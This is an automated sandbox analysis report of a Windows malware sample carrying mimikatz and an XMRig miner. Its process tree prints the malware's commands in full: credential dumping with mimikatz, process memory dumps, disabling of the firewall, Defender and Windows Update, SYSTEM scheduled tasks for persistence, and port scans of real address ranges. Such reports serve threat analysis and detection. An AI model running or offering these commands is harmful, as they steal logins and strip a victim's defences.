Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    29/07/2024, 07:50

General

  • Target

    2024-07-29_8b634c51d57b82bc02175c3c1a95f183_hacktools_icedid_mimikatz.exe

  • Size

    8.9MB

  • MD5

    8b634c51d57b82bc02175c3c1a95f183

  • SHA1

    f4287505389da7ada1a3ff7ac69015d32e66f7a8

  • SHA256

    9f31be7b730acd3b17f92befbc8047e81d6dc1e1b799203e7550dce6f6e54538

  • SHA512

    b19397d18301e269894e70dd7db18efaf97e8d019d2b7aecc27bacb8d320b6825ee00815fd8178f8a3b9b5c7b04bdf83953123ef58b3ee262d404a51e48af10b

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (28191) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 13 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 6 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 19 IoCs
  • Loads dropped DLL 25 IoCs
  • UPX packed file 36 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 12 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:356
      • C:\Windows\TEMP\ulrjiniyw\ngnktt.exe
        "C:\Windows\TEMP\ulrjiniyw\ngnktt.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1760
    • C:\Users\Admin\AppData\Local\Temp\2024-07-29_8b634c51d57b82bc02175c3c1a95f183_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-07-29_8b634c51d57b82bc02175c3c1a95f183_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2644
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\epzdzalw\eutlybl.exe
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2696
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2764
        • C:\Windows\epzdzalw\eutlybl.exe
          C:\Windows\epzdzalw\eutlybl.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2788
    • C:\Windows\epzdzalw\eutlybl.exe
      C:\Windows\epzdzalw\eutlybl.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2796
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2900
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2604
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
            PID:2552
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2568
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
              PID:2596
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2624
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
                PID:2672
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static del all
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • Modifies data under HKEY_USERS
              PID:1780
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add policy name=Bastards description=FuckingBastards
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • Modifies data under HKEY_USERS
              PID:2416
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filteraction name=BastardsList action=block
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3016
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\lubylzzgb\ykiginhbj\wpcap.exe /S
              2⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:644
              • C:\Windows\lubylzzgb\ykiginhbj\wpcap.exe
                C:\Windows\lubylzzgb\ykiginhbj\wpcap.exe /S
                3⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2612
                • C:\Windows\SysWOW64\net.exe
                  net stop "Boundary Meter"
                  4⤵
                    PID:1488
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop "Boundary Meter"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:408
                  • C:\Windows\SysWOW64\net.exe
                    net stop "TrueSight Meter"
                    4⤵
                      PID:540
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop "TrueSight Meter"
                        5⤵
                          PID:1908
                      • C:\Windows\SysWOW64\net.exe
                        net stop npf
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:2040
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop npf
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:2652
                      • C:\Windows\SysWOW64\net.exe
                        net start npf
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:2164
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 start npf
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:2044
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net start npf
                    2⤵
                      PID:2248
                      • C:\Windows\SysWOW64\net.exe
                        net start npf
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2148
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 start npf
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:2432
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net start npf
                      2⤵
                        PID:2024
                        • C:\Windows\SysWOW64\net.exe
                          net start npf
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1360
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 start npf
                            4⤵
                              PID:1600
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c C:\Windows\lubylzzgb\ykiginhbj\gptfqrllu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lubylzzgb\ykiginhbj\Scant.txt
                          2⤵
                          • Loads dropped DLL
                          PID:2064
                          • C:\Windows\lubylzzgb\ykiginhbj\gptfqrllu.exe
                            C:\Windows\lubylzzgb\ykiginhbj\gptfqrllu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lubylzzgb\ykiginhbj\Scant.txt
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:916
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c C:\Windows\lubylzzgb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lubylzzgb\Corporate\log.txt
                          2⤵
                          • Loads dropped DLL
                          • Drops file in Windows directory
                          • System Location Discovery: System Language Discovery
                          PID:1608
                          • C:\Windows\lubylzzgb\Corporate\vfshost.exe
                            C:\Windows\lubylzzgb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1808
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ybtyblvzi" /ru system /tr "cmd /c C:\Windows\ime\eutlybl.exe"
                          2⤵
                            PID:2252
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2156
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /sc minute /mo 1 /tn "ybtyblvzi" /ru system /tr "cmd /c C:\Windows\ime\eutlybl.exe"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:1640
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lptlwpdhi" /ru system /tr "cmd /c echo Y|cacls C:\Windows\epzdzalw\eutlybl.exe /p everyone:F"
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:2480
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              3⤵
                                PID:892
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /create /sc minute /mo 1 /tn "lptlwpdhi" /ru system /tr "cmd /c echo Y|cacls C:\Windows\epzdzalw\eutlybl.exe /p everyone:F"
                                3⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:1120
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "whqitziyu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ulrjiniyw\ngnktt.exe /p everyone:F"
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:596
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:2228
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /create /sc minute /mo 1 /tn "whqitziyu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ulrjiniyw\ngnktt.exe /p everyone:F"
                                3⤵
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:1560
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • Modifies data under HKEY_USERS
                              PID:1612
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:2748
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:2832
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static set policy name=Bastards assign=y
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              • Modifies data under HKEY_USERS
                              PID:2596
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              • Modifies data under HKEY_USERS
                              PID:1288
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:908
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:1576
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static set policy name=Bastards assign=y
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:2736
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              • Modifies data under HKEY_USERS
                              PID:2328
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              • Modifies data under HKEY_USERS
                              PID:2620
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              • Modifies data under HKEY_USERS
                              PID:1804
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static set policy name=Bastards assign=y
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:1744
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net stop SharedAccess
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:2792
                              • C:\Windows\SysWOW64\net.exe
                                net stop SharedAccess
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:2376
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop SharedAccess
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1724
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c netsh firewall set opmode mode=disable
                              2⤵
                                PID:2040
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh firewall set opmode mode=disable
                                  3⤵
                                  • Modifies Windows Firewall
                                  • Event Triggered Execution: Netsh Helper DLL
                                  • Modifies data under HKEY_USERS
                                  PID:2180
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c netsh Advfirewall set allprofiles state off
                                2⤵
                                  PID:2044
                                  • C:\Windows\SysWOW64\netsh.exe
                                    netsh Advfirewall set allprofiles state off
                                    3⤵
                                    • Modifies Windows Firewall
                                    • Event Triggered Execution: Netsh Helper DLL
                                    • System Location Discovery: System Language Discovery
                                    • Modifies data under HKEY_USERS
                                    PID:3048
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c net stop MpsSvc
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2612
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop MpsSvc
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:912
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop MpsSvc
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2972
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c net stop WinDefend
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1056
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop WinDefend
                                    3⤵
                                      PID:2072
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 stop WinDefend
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2168
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c net stop wuauserv
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1088
                                    • C:\Windows\SysWOW64\net.exe
                                      net stop wuauserv
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1376
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 stop wuauserv
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1604
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config MpsSvc start= disabled
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1992
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config MpsSvc start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      PID:900
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config SharedAccess start= disabled
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1680
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config SharedAccess start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:960
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config WinDefend start= disabled
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2820
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config WinDefend start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:932
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config wuauserv start= disabled
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2128
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config wuauserv start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:1596
                                  • C:\Windows\TEMP\xohudmc.exe
                                    C:\Windows\TEMP\xohudmc.exe
                                    2⤵
                                    • Executes dropped EXE
                                    • Drops file in System32 directory
                                    • Suspicious use of SetWindowsHookEx
                                    PID:1792
                                  • C:\Windows\TEMP\lubylzzgb\bkdihhqll.exe
                                    C:\Windows\TEMP\lubylzzgb\bkdihhqll.exe -accepteula -mp 356 C:\Windows\TEMP\lubylzzgb\356.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2484
                                  • C:\Windows\TEMP\lubylzzgb\bkdihhqll.exe
                                    C:\Windows\TEMP\lubylzzgb\bkdihhqll.exe -accepteula -mp 1108 C:\Windows\TEMP\lubylzzgb\1108.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1640
                                  • C:\Windows\TEMP\lubylzzgb\bkdihhqll.exe
                                    C:\Windows\TEMP\lubylzzgb\bkdihhqll.exe -accepteula -mp 1164 C:\Windows\TEMP\lubylzzgb\1164.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:536
                                  • C:\Windows\TEMP\lubylzzgb\bkdihhqll.exe
                                    C:\Windows\TEMP\lubylzzgb\bkdihhqll.exe -accepteula -mp 852 C:\Windows\TEMP\lubylzzgb\852.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:836
                                  • C:\Windows\TEMP\lubylzzgb\bkdihhqll.exe
                                    C:\Windows\TEMP\lubylzzgb\bkdihhqll.exe -accepteula -mp 1564 C:\Windows\TEMP\lubylzzgb\1564.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1444
                                  • C:\Windows\TEMP\lubylzzgb\bkdihhqll.exe
                                    C:\Windows\TEMP\lubylzzgb\bkdihhqll.exe -accepteula -mp 548 C:\Windows\TEMP\lubylzzgb\548.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2412
                                  • C:\Windows\TEMP\lubylzzgb\bkdihhqll.exe
                                    C:\Windows\TEMP\lubylzzgb\bkdihhqll.exe -accepteula -mp 2344 C:\Windows\TEMP\lubylzzgb\2344.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1804
                                  • C:\Windows\TEMP\lubylzzgb\bkdihhqll.exe
                                    C:\Windows\TEMP\lubylzzgb\bkdihhqll.exe -accepteula -mp 1940 C:\Windows\TEMP\lubylzzgb\1940.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1932
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c C:\Windows\lubylzzgb\ykiginhbj\scan.bat
                                    2⤵
                                    • Loads dropped DLL
                                    PID:2820
                                    • C:\Windows\lubylzzgb\ykiginhbj\njtnwaezu.exe
                                      njtnwaezu.exe TCP 194.110.0.1 194.110.255.255 445 512 /save
                                      3⤵
                                      • Executes dropped EXE
                                      • Drops file in Windows directory
                                      • System Location Discovery: System Language Discovery
                                      PID:580
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                    2⤵
                                      PID:2188
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3236
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2184
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                          PID:3336
                                        • C:\Windows\SysWOW64\cacls.exe
                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:832
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3348
                                        • C:\Windows\SysWOW64\cacls.exe
                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:828
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                                      1⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2116
                                    • C:\Windows\system32\conhost.exe
                                      \??\C:\Windows\system32\conhost.exe "-359935591600814508-7466687221230542013203069467-1120605725392159766-23195575"
                                      1⤵
                                        PID:1488
                                      • C:\Windows\system32\conhost.exe
                                        \??\C:\Windows\system32\conhost.exe "3926529802019212240212605796575835980516635262505052001511913282981-119756757"
                                        1⤵
                                          PID:540
                                        • C:\Windows\system32\conhost.exe
                                          \??\C:\Windows\system32\conhost.exe "513464788-491263469937004576-38122177221332664331538274437-328280830244052121"
                                          1⤵
                                            PID:2248
                                          • C:\Windows\system32\conhost.exe
                                            \??\C:\Windows\system32\conhost.exe "-504346442-1640510854-1905795437674343587-19828142431807742046-625307175-1954050080"
                                            1⤵
                                              PID:1600
                                            • C:\Windows\SysWOW64\huzbeq.exe
                                              C:\Windows\SysWOW64\huzbeq.exe
                                              1⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetWindowsHookEx
                                              PID:2852
                                            • C:\Windows\system32\taskeng.exe
                                              taskeng.exe {6D8B439D-3A50-4F4F-B827-0F9668D94904} S-1-5-18:NT AUTHORITY\System:Service:
                                              1⤵
                                                PID:1800
                                                • C:\Windows\system32\cmd.EXE
                                                  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ulrjiniyw\ngnktt.exe /p everyone:F
                                                  2⤵
                                                    PID:2764
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                      3⤵
                                                        PID:2832
                                                      • C:\Windows\system32\cacls.exe
                                                        cacls C:\Windows\TEMP\ulrjiniyw\ngnktt.exe /p everyone:F
                                                        3⤵
                                                          PID:1568
                                                      • C:\Windows\system32\cmd.EXE
                                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\epzdzalw\eutlybl.exe /p everyone:F
                                                        2⤵
                                                          PID:1264
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                            3⤵
                                                              PID:2576
                                                            • C:\Windows\system32\cacls.exe
                                                              cacls C:\Windows\epzdzalw\eutlybl.exe /p everyone:F
                                                              3⤵
                                                                PID:2672
                                                            • C:\Windows\system32\cmd.EXE
                                                              C:\Windows\system32\cmd.EXE /c C:\Windows\ime\eutlybl.exe
                                                              2⤵
                                                                PID:2768
                                                                • C:\Windows\ime\eutlybl.exe
                                                                  C:\Windows\ime\eutlybl.exe
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:2552
                                                              • C:\Windows\system32\cmd.EXE
                                                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ulrjiniyw\ngnktt.exe /p everyone:F
                                                                2⤵
                                                                  PID:2380
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                    3⤵
                                                                      PID:2188
                                                                    • C:\Windows\system32\cacls.exe
                                                                      cacls C:\Windows\TEMP\ulrjiniyw\ngnktt.exe /p everyone:F
                                                                      3⤵
                                                                        PID:2880
                                                                    • C:\Windows\system32\cmd.EXE
                                                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\epzdzalw\eutlybl.exe /p everyone:F
                                                                      2⤵
                                                                        PID:3192
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                          3⤵
                                                                            PID:1520
                                                                          • C:\Windows\system32\cacls.exe
                                                                            cacls C:\Windows\epzdzalw\eutlybl.exe /p everyone:F
                                                                            3⤵
                                                                              PID:3140
                                                                          • C:\Windows\system32\cmd.EXE
                                                                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\eutlybl.exe
                                                                            2⤵
                                                                              PID:1988
